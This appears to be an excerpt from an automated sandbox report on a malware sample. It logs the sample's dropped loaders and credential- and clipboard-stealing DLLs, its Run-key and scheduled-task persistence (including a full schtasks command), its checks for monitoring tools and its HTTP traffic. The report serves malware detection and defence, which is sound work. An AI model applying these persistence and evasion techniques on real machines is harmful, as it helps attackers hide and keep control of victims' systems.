Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static file information: File size 2962432 > 1048576
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: Raw size of wvtamnbw is bigger than: 0x100000 < 0x2a1000

Data Obfuscation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Unpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 2.2.explorha.exe.700000.0.unpack :EW;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 3.2.explorha.exe.700000.0.unpack :EW;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Unpacked PE file: 14.2.amert.exe.360000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Unpacked PE file: 15.2.chrosha.exe.70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Unpacked PE file: 20.2.c884f8452a.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 28.2.MPGPH131.exe.890000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 29.2.MPGPH131.exe.890000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Unpacked PE file: 36.2.c884f8452a.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 45.2.RageMP131.exe.370000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Unpacked PE file: 51.2.c884f8452a.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
Source: build12[1].exe.50.dr Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: cred64[1].dll.50.dr Static PE information: real checksum: 0x0 should be: 0x14356f
Source: build12.exe0.50.dr Static PE information: real checksum: 0x0 should be: 0x1f60e
Source: cred64[1].dll.6.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
Source: amert.exe.6.dr Static PE information: real checksum: 0x1d614a should be: 0x1d4933
Source: chrosha.exe.14.dr Static PE information: real checksum: 0x1d614a should be: 0x1d4933
Source: clip64.dll.50.dr Static PE information: real checksum: 0x0 should be: 0x2272f
Source: explorha.exe.0.dr Static PE information: real checksum: 0x2d5a1e should be: 0x2d41c5
Source: clip64.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: build12.exe.50.dr Static PE information: real checksum: 0x0 should be: 0x1f60e
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: real checksum: 0x2d5a1e should be: 0x2d41c5
Source: amert[1].exe.6.dr Static PE information: real checksum: 0x1d614a should be: 0x1d4933
Source: clip64[1].dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: build12[1].exe.50.dr Static PE information: real checksum: 0x0 should be: 0x1f60e
Source: clip64[1].dll.50.dr Static PE information: real checksum: 0x0 should be: 0x2272f
Source: cred64.dll.50.dr Static PE information: real checksum: 0x0 should be: 0x14356f
Source: cred64.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name: .idata
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name: wvtamnbw
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name: jjaorssu
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name: .taggant
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name: wvtamnbw
Source: explorha.exe.0.dr Static PE information: section name: jjaorssu
Source: explorha.exe.0.dr Static PE information: section name: .taggant
Source: cred64[1].dll.6.dr Static PE information: section name: _RDATA
Source: cred64.dll.6.dr Static PE information: section name: _RDATA
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: fbupybke
Source: amert[1].exe.6.dr Static PE information: section name: ejxqaids
Source: amert[1].exe.6.dr Static PE information: section name: .taggant
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: .idata
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: fbupybke
Source: amert.exe.6.dr Static PE information: section name: ejxqaids
Source: amert.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: ejwyeyni
Source: random[1].exe0.6.dr Static PE information: section name: zoeuqxwb
Source: c884f8452a.exe.6.dr Static PE information: section name:
Source: c884f8452a.exe.6.dr Static PE information: section name: .idata
Source: c884f8452a.exe.6.dr Static PE information: section name:
Source: c884f8452a.exe.6.dr Static PE information: section name: ejwyeyni
Source: c884f8452a.exe.6.dr Static PE information: section name: zoeuqxwb
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: .idata
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: oavneyqq
Source: sarra[1].exe.6.dr Static PE information: section name: ixcwzfpc
Source: chrosha.exe.14.dr Static PE information: section name:
Source: chrosha.exe.14.dr Static PE information: section name: .idata
Source: chrosha.exe.14.dr Static PE information: section name:
Source: chrosha.exe.14.dr Static PE information: section name: fbupybke
Source: chrosha.exe.14.dr Static PE information: section name: ejxqaids
Source: chrosha.exe.14.dr Static PE information: section name: .taggant
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name: .idata
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name: ejwyeyni
Source: RageMP131.exe.20.dr Static PE information: section name: zoeuqxwb
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name: .idata
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name: ejwyeyni
Source: MPGPH131.exe.20.dr Static PE information: section name: zoeuqxwb
Source: cred64[1].dll.50.dr Static PE information: section name: _RDATA
Source: cred64.dll.50.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B929A0 push esp; ret 0_2_00B929A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B89420 push ebx; ret 0_2_00B8942A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B88DE6 push esi; iretd 0_2_00B88DE7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B9EFBC push ecx; ret 0_2_00B9EFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0070C0E8 push cs; retn 0002h 2_2_0070C0E9
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00709420 push ebx; ret 2_2_0070942A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00708DE6 push esi; iretd 2_2_00708DE7
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0071EFBC push ecx; ret 2_2_0071EFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_0070C0E8 push cs; retn 0002h 3_2_0070C0E9
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00709420 push ebx; ret 3_2_0070942A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00708DE6 push esi; iretd 3_2_00708DE7
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_0071EFBC push ecx; ret 3_2_0071EFCF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848CB00BD pushad ; iretd 11_2_00007FF848CB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848D8CACC push eax; retf 0000h 11_2_00007FF848D8CAD5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848D8CA9F push 140000C9h; retf 0000h 11_2_00007FF848D8CAB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848D80DB9 push eax; ret 11_2_00007FF848D80DD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848D8CF30 push eax; iretd 11_2_00007FF848D8CF61
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_0037D28C push ecx; ret 14_2_0037D29F
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name: entropy: 7.974297481762842
Source: explorha.exe.0.dr Static PE information: section name: entropy: 7.974297481762842
Source: amert[1].exe.6.dr Static PE information: section name: entropy: 7.980367322356868
Source: amert[1].exe.6.dr Static PE information: section name: fbupybke entropy: 7.952909089297466
Source: amert.exe.6.dr Static PE information: section name: entropy: 7.980367322356868
Source: amert.exe.6.dr Static PE information: section name: fbupybke entropy: 7.952909089297466
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.9276781775055
Source: random[1].exe0.6.dr Static PE information: section name: ejwyeyni entropy: 7.949249760690904
Source: c884f8452a.exe.6.dr Static PE information: section name: entropy: 7.9276781775055
Source: c884f8452a.exe.6.dr Static PE information: section name: ejwyeyni entropy: 7.949249760690904
Source: sarra[1].exe.6.dr Static PE information: section name: entropy: 7.927704281329572
Source: sarra[1].exe.6.dr Static PE information: section name: oavneyqq entropy: 7.951558451221909
Source: chrosha.exe.14.dr Static PE information: section name: entropy: 7.980367322356868
Source: chrosha.exe.14.dr Static PE information: section name: fbupybke entropy: 7.952909089297466
Source: RageMP131.exe.20.dr Static PE information: section name: entropy: 7.9276781775055
Source: RageMP131.exe.20.dr Static PE information: section name: ejwyeyni entropy: 7.949249760690904
Source: MPGPH131.exe.20.dr Static PE information: section name: entropy: 7.9276781775055
Source: MPGPH131.exe.20.dr Static PE information: section name: ejwyeyni entropy: 7.949249760690904
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 831840b410.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c884f8452a.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File created: C:\Windows\Tasks\explorha.job
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 831840b410.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 831840b410.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c884f8452a.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c884f8452a.exe
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 30946 (3 events)
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49883 (3 events)
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 30946 (3 events)
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49889 (3 events)
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 30946 (2 events)
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49997 (2 events)
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 30946 (2 events)
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 49998 (2 events)
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 30946 (2 events)
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50094 (6 events)
Source: unknown Network traffic detected: HTTP traffic on port 50095 -> 30946 (2 events)
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50095 (5 events)
Source: unknown Network traffic detected: HTTP traffic on port 50461 -> 30946 (2 events)
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50461 (3 events)
Source: unknown Network traffic detected: HTTP traffic on port 50462 -> 30946 (2 events)
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50462 (3 events)
Source: unknown Network traffic detected: HTTP traffic on port 50784 -> 30946 (2 events)
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50784 (1 event)
Source: unknown Network traffic detected: HTTP traffic on port 50785 -> 30946 (2 events)
Source: unknown Network traffic detected: HTTP traffic on port 30946 -> 50785 (1 event)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
